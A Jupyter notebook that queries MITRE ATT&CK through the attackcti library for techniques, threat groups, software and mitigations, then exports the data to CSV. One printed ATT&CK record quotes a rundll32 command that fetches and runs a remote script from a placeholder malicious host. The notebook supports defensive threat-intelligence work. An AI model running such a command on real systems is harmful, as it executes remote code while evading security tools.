from attackcti import attack_client
from pandas import *
from pandas.io.json import json_normalize
# Instantiate the attackcti client used by every cell below. The client retrieves
# ATT&CK STIX content from MITRE's public TAXII server, so these cells need network
# access (see the CPU-vs-wall-time gap reported at the get_all_attack() cell).
lift = attack_client()
You can use a custom method of the attack_client class to get a technique by its name across all the matrices. The name lookup is case sensitive.
# Look up a single technique by its (case-sensitive) name across all matrices.
# Returns one dict (see the output below), not a list.
technique_name = lift.get_technique_by_name('Rundll32')
# Display the record.
technique_name
{'type': 'attack-pattern', 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'created': '2017-05-31 21:31:06.045000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], 'url': 'https://attack.mitre.org/wiki/Technique/T1085', 'matrix': 'mitre-attack', 'technique': 'Rundll32', 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\n\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nDetection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. 
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\n\nPlatforms: Windows\n\nData Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring\n\nDefense Bypassed: Anti-virus, Application whitelisting\n\nPermissions Required: User\n\nRemote Support: No\n\nContributors: Ricardo Dias, Casey Smith', 'tactic': ['defense-evasion', 'execution'], 'technique_id': 'T1085', 'platform': ['Windows'], 'data_sources': ['File monitoring', 'Binary file metadata', 'Process command-line parameters', 'Process monitoring'], 'defense_bypassed': ['Anti-virus', 'Application whitelisting'], 'permissions_required': ['User'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': False, 'contributors': ['Ricardo Dias', 'Casey Smith'], 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1085', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf', 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
# Distinct data-source names referenced by techniques. The names come back
# lower-cased (see the list below), whereas a technique's own 'data_sources'
# values are mixed case ('File monitoring'), so compare them case-insensitively.
data_sources = lift.get_all_data_sources()
# Number of data sources (48 in the recorded run).
len(data_sources)
48
# Display the full list of data-source names.
data_sources
['browser extensions', 'web application firewall logs', 'named pipes', 'dns records', 'mbr', 'detonation chamber', 'windows error reporting', 'powershell logs', 'asset management', 'web logs', 'ssl/tls inspection', 'access tokens', 'application logs', 'data loss prevention', 'windows registry', 'network device logs', 'binary file metadata', 'anti-virus', 'vbr', 'file monitoring', 'services', 'web proxy', 'digital certificate logs', 'bios', 'malware reverse engineering', 'user interface', 'system calls', 'host network interface', 'efi', 'windows event logs', 'api monitoring', 'network intrusion detection system', 'dll monitoring', 'environment variable', 'packet capture', 'mail server', 'wmi objects', 'netflow/enclave netflow', 'sensor health and status', 'process monitoring', 'network protocol analysis', 'kernel drivers', 'process use of network', 'loaded dlls', 'third-party application logs', 'authentication logs', 'email gateway', 'process command-line parameters']
# Fetch one STIX object of the given type by its ATT&CK id; here an attack-pattern
# from the PRE-ATT&CK matrix (ids prefixed 'PRE-'). Returns a single dict.
object_by_id = lift.get_object_by_attack_id('attack-pattern', 'PRE-T1054')
# Display the record.
object_by_id
{'type': 'attack-pattern', 'id': 'attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'created': '2017-12-14 16:46:06.044000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054', 'matrix': 'mitre-pre-attack', 'technique': 'Acquire OSINT data sets and information', 'technique_description': 'Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)\n\nDetectable by Common Defenses: No\n\nDetectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.\n\nDifficulty for the Adversary: Yes\n\nDifficulty for the Adversary explanation: Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). 
Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.', 'tactic': ['organizational-information-gathering'], 'technique_id': 'PRE-T1054', 'platform': None, 'data_sources': None, 'defense_bypassed': None, 'permissions_required': None, 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054', 'SANSThreatProfile', 'Infosec-osint', 'isight-osint'], 'detectable_by_common_defenses': 'No', 'detectable_explanation': 'This activity is indistinguishable from legitimate business uses and easy to obtain.', 'difficulty_for_adversary': 'Yes', 'difficulty_explanation': 'Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.', 'tactic_type': None}
You can get any Group by its Alias property across all the matrices. It is case sensitive.
# Look up a group (intrusion-set) by any of its aliases; the alias must match case exactly.
# The returned dict is keyed by the group's primary name ('APT29' below), not the alias used.
group_name = lift.get_group_by_alias('Cozy Bear')
# Display the record.
group_name
{'type': 'intrusion-set', 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542', 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5', 'matrix': 'mitre-attack', 'created': '2017-05-31 21:31:52.748000+00:00', 'modified': '2018-04-18 17:59:24.739000+00:00', 'url': 'https://attack.mitre.org/wiki/Group/G0016', 'group': 'APT29', 'group_description': 'APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)', 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'], 'group_id': 'G0016', 'group_references': ['https://attack.mitre.org/wiki/Group/G0016', 'https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf', 'GRIZZLY STEPPE JAR', 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/']}
# All relationships whose source object is a piece of software. Returns a list;
# in the first record 'target_object' is the STIX id of an attack-pattern and the
# software_* fields describe the source.
relationships = lift.get_relationships_by_object('software')
# Inspect only the first relationship.
relationships[0]
{'target_object': 'attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e', 'relationship_description': 'Cobalt Strike uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.', 'software_type': 'tool', 'matrix': 'mitre-attack', 'software': 'Cobalt Strike', 'software_description': 'Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)\n\nIn addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. (Citation: cobaltstrike manual)\n\nAliases: Cobalt Strike\n\nContributors: Josh Abraham', 'software_labels': ['tool'], 'software_id': 'S0154', 'url': 'https://attack.mitre.org/wiki/Software/S0154', 'software_aliases': ['Cobalt Strike'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0154', 'https://cobaltstrike.com/downloads/csmanual38.pdf']}
The difference between this function and get_all_techniques() is that get_all_techniques_with_mitigations() returns (of course haha) the mitigations mapped to their respective techniques. This is useful when you want to gather mitigations and techniques all at once.
# Every technique joined with its mitigation; each record carries both the
# mitigation_* and the technique_* fields (see below). Returns a list.
complete_techniques = lift.get_all_techniques_with_mitigations()
# Inspect only the first record.
complete_techniques[0]
{'matrix': 'mitre-attack', 'mitigation': '.bash_profile and .bashrc Mitigation', 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.', 'mitigation_id': 'T1156', 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'], 'technique': '.bash_profile and .bashrc', 'technique_description': "<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed.\n\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.\n\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\n\nDetection: While users may customize their <code>~/.bashrc</code> and <code>~/.bash_profile</code> files , there are only certain types of commands that typically appear in these files. 
Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nPlatforms: Linux, macOS\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\n\nPermissions Required: User, Administrator", 'tactic': ['persistence'], 'url': 'https://attack.mitre.org/wiki/Technique/T1156', 'technique_id': 'T1156', 'platform': ['Linux', 'macOS'], 'data_sources': ['File monitoring', 'Process Monitoring', 'Process command-line parameters', 'Process use of network'], 'defense_bypassed': None, 'permissions_required': ['User', 'Administrator'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156', 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
If you do not provide the name of a specific Software (Case Sensitive), the function returns information about every piece of software across all the matrices.
# Techniques a given piece of software is known to use (case-sensitive name).
# Each record carries the software_* fields, the technique_* fields and the
# 'relationship_description' that links them. Returns a list.
software_techniques = lift.get_techniques_used_by_software('BITSAdmin')
# Inspect only the first record.
software_techniques[0]
{'matrix': 'mitre-attack', 'relationship_description': 'can be used to create BITS Jobs to upload and/or download files.', 'software': 'BITSAdmin', 'software_description': 'is a command line tool used to create and manage BITS Jobs. (Citation: Microsoft BITSAdmin)\n\nAliases: BITSAdmin', 'software_labels': ['tool'], 'software_id': 'S0190', 'software_aliases': ['BITSAdmin'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0190', 'https://msdn.microsoft.com/library/aa362813.aspx'], 'technique': 'Remote File Copy', 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\n\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\n\nPermissions Required: User\n\nRequires Network: Yes', 'tactic': ['command-and-control', 'lateral-movement'], 'technique_id': 'T1105', 'url': 'https://attack.mitre.org/wiki/Technique/T1105'}
If you do not provide the name of a specific Group (Case Sensitive), the function returns information about all the groups available across all the matrices.
# Techniques a given group is known to use (case-sensitive name). Records can come
# from any matrix — the first one below is from 'mitre-pre-attack'. Returns a list.
group_techniques = lift.get_techniques_used_by_group('APT12')
# Inspect only the first record.
group_techniques[0]
{'matrix': 'mitre-pre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'technique': 'Determine strategic target', 'technique_description': 'An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 (R)) (Citation: DoD Cyber 2015)\n\nDetectable by Common Defenses: No\n\nDetectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.\n\nDifficulty for the Adversary: Yes\n\nDifficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.', 'tactic': ['target-selection'], 'technique_id': 'PRE-T1018', 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018'}
If you do not provide the name of a specific Group, the function returns information about all the groups available across all the matrices.
# Software a given group is known to use, one record per software/technique pair.
# Note the 'software url' key (with a space), which differs from the 'url' key used
# by other records; keep that in mind when selecting columns later.
group_software = lift.get_software_used_by_group('APT12')
# Inspect only the first record.
group_software[0]
{'matrix': 'mitre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'software url': 'https://attack.mitre.org/wiki/Software/S0015', 'software': 'Ixeshe', 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\n\nAliases: Ixeshe', 'software_labels': ['malware'], 'software_id': 'S0015', 'software_aliases': ['Ixeshe'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0015', 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'], 'technique': 'Data Obfuscation', 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\n\nRequires Network: Yes', 'tactic': ['command-and-control'], 'technique_id': 'T1001'}
# Everything (techniques and software) used by the group. The first record is the
# same software/technique pair that get_software_used_by_group() returned above.
all_used_by_group = lift.get_all_used_by_group('APT12')
# Inspect only the first record.
all_used_by_group[0]
{'matrix': 'mitre-attack', 'relationship_description': None, 'group': 'APT12', 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)', 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'], 'group_id': 'G0005', 'group_references': ['https://attack.mitre.org/wiki/Group/G0005', 'http://www.crowdstrike.com/blog/whois-numbered-panda/'], 'software url': 'https://attack.mitre.org/wiki/Software/S0015', 'software': 'Ixeshe', 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\n\nAliases: Ixeshe', 'software_labels': ['malware'], 'software_id': 'S0015', 'software_aliases': ['Ixeshe'], 'software_references': ['https://attack.mitre.org/wiki/Software/S0015', 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'], 'technique': 'Data Obfuscation', 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\n\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\n\nRequires Network: Yes', 'tactic': ['command-and-control'], 'technique_id': 'T1001'}
# Pull every ATT&CK object in one call. IPython's %time magic reports the cost: in the
# recorded run ~14 s of CPU but ~41 s of wall time, so most of it is presumably spent
# waiting on the remote server rather than on local processing.
%time all_attack_framework = lift.get_all_attack()
CPU times: user 13.9 s, sys: 280 ms, total: 14.2 s Wall time: 41.3 s
# The combined result is a plain list (of dicts, see the next cell).
type(all_attack_framework)
list
# First record; it has the same shape as the techniques-with-mitigations output above.
all_attack_framework[0]
{'matrix': 'mitre-attack', 'mitigation': '.bash_profile and .bashrc Mitigation', 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.', 'mitigation_id': 'T1156', 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'], 'technique': '.bash_profile and .bashrc', 'technique_description': "<code>~/.bash_profile</code> and <code>~/.bashrc</code> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), <code>~/.bash_profile</code> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, <code>~/.bashrc</code> is executed. This allows users more fine grained control over when they want certain commands executed.\n\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.\n\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\n\nDetection: While users may customize their <code>~/.bashrc</code> and <code>~/.bash_profile</code> files , there are only certain types of commands that typically appear in these files. 
Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nPlatforms: Linux, macOS\n\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\n\nPermissions Required: User, Administrator", 'tactic': ['persistence'], 'url': 'https://attack.mitre.org/wiki/Technique/T1156', 'technique_id': 'T1156', 'platform': ['Linux', 'macOS'], 'data_sources': ['File monitoring', 'Process Monitoring', 'Process command-line parameters', 'Process use of network'], 'defense_bypassed': None, 'permissions_required': ['User', 'Administrator'], 'effective_permissions': None, 'system_requirements': None, 'network_requirements': None, 'remote_support': None, 'contributors': None, 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156', 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'], 'detectable_by_common_defenses': None, 'detectable_explanation': None, 'difficulty_for_adversary': None, 'difficulty_explanation': None, 'tactic_type': None}
Showing the schema of the results
# Flatten the list of ATT&CK records into a DataFrame, one row per record.
# json_normalize is imported at the top of the notebook from pandas.io.json;
# current pandas also exposes it as pandas.json_normalize.
df = json_normalize(all_attack_framework)
# Column names present in the flattened frame (the union of keys across all records).
list(df.columns)
['contributors', 'data_sources', 'defense_bypassed', 'detectable_by_common_defenses', 'detectable_explanation', 'difficulty_explanation', 'difficulty_for_adversary', 'effective_permissions', 'group', 'group_aliases', 'group_description', 'group_id', 'group_references', 'matrix', 'mitigation', 'mitigation_description', 'mitigation_id', 'mitigation_references', 'network_requirements', 'permissions_required', 'platform', 'relationship_description', 'remote_support', 'software', 'software url', 'software_aliases', 'software_description', 'software_id', 'software_labels', 'software_references', 'system_requirements', 'tactic', 'tactic_type', 'technique', 'technique_description', 'technique_id', 'technique_references', 'url']
# Columns to export, in output order. Every listed name must exist in df (pandas
# raises KeyError otherwise); the 'software url' column seen above is intentionally
# dropped in favour of the common 'url' column.
export_columns = [
    'matrix', 'tactic', 'technique', 'technique_id', 'technique_description',
    'mitigation', 'mitigation_description', 'group', 'group_id', 'group_aliases',
    'group_description', 'software', 'software_id', 'software_description', 'software_labels',
    'relationship_description', 'platform', 'data_sources', 'detectable_by_common_defenses', 'detectable_explanation',
    'difficulty_for_adversary', 'difficulty_explanation', 'effective_permissions', 'network_requirements', 'permissions_required',
    'remote_support', 'system_requirements', 'contributors', 'url',
]
df = df.loc[:, export_columns]
# Write the frame without the integer index. The description fields are free text from
# the dataset (embedded newlines, <code> HTML tags); to_csv quotes them, but if the file
# is later opened in a spreadsheet, any cell beginning with '=', '+', '-' or '@' would be
# interpreted as a formula — post-process the export if that is a concern.
df.to_csv('all_attack.csv', index=False, encoding='utf-8')